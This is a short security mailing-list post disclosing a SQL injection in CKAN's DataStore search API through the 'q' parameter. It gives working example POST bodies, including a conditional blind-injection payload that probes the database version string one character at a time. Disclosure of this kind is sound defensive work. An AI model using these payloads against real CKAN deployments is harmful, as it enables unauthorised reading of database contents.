[CKAN-Security] SQL Injection Vulnerability

• Previous message: [CKAN-Security] Blind SQL Injection & DOS vulnerability with CKAN DataStore
• Next message: [CKAN-Security] SQL Injection Vulnerability
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi, I've found a SQL Injection vulnerability on /api/3/action/datastore_search. I've exploited it on "q" parameter, but maybe other parameters are affected too.

Example POST data:
Query fails
{"resource_id":"38a8888c-30fd-4002-810e-6b7fe87a6fb2","q":" ' " ,"filters":{},"limit":100,"offset":0}

Query doesn't fail because PostgreSQL version string is "PostrgreSQL..." and "o" is the second char of the string.
{"resource_id":"38a8888c-30fd-4002-810e-6b7fe87a6fb2","q":"'|| (SELECT CASE substr(version(),2,1) WHEN 'o' THEN 'A' ELSE sleep(5) END) ||'" ,"filters":{},"limit":100,"offset":0}
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20180608/151285fe/attachment.html>

• Previous message: [CKAN-Security] Blind SQL Injection & DOS vulnerability with CKAN DataStore
• Next message: [CKAN-Security] SQL Injection Vulnerability
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]